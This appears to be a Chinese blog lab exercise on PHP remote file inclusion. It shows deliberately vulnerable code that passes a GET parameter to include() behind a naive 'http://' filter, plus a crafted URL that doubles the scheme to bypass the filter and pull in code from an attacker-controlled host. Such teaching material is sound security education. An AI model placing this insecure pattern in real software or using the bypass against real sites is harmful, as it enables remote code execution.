文件包含漏洞实验
在本次實驗前要先開啟遠程包含如下圖所示:
某php程序員小白將下面的代碼命名成test.php部署到網站http://websecurity.163.com/的根目錄下
<?php$filename = $_GET['file'];//將參數file的值傳遞給$filename$filename = str_replace( array( "http://", "https://" ), "", $filename );//為防止遠程文件執行過濾了http://和https://字段include($filename);//使用include()函數包含$filename文件?>安全工程師小黑研究該網站后在自己網站http://hack.163.com/根目錄下上傳了phpinfo.txt,代碼如下:
<?phpphpinfo();?>請問小黑利用該phpinfo.txt應該如何構造URL才能在websecurity.163.com執行phpinfo函數?
我們可以很容易的知道url為:http://websecurity.163.com/demo1/test.php?file=httphttp://://hack.163.com/demo1/phpinfo.txt
我們用本機測試下:
http://websecurity.163.com/demo1/test.php?file=httphttp://://websecurity.163.com/demo1/phpinfo.txt
如下圖:
總結
- 上一篇: Qt工作笔记-使用QFileSystem
- 下一篇: Qt工作笔记-使用信号与槽让两个界面进行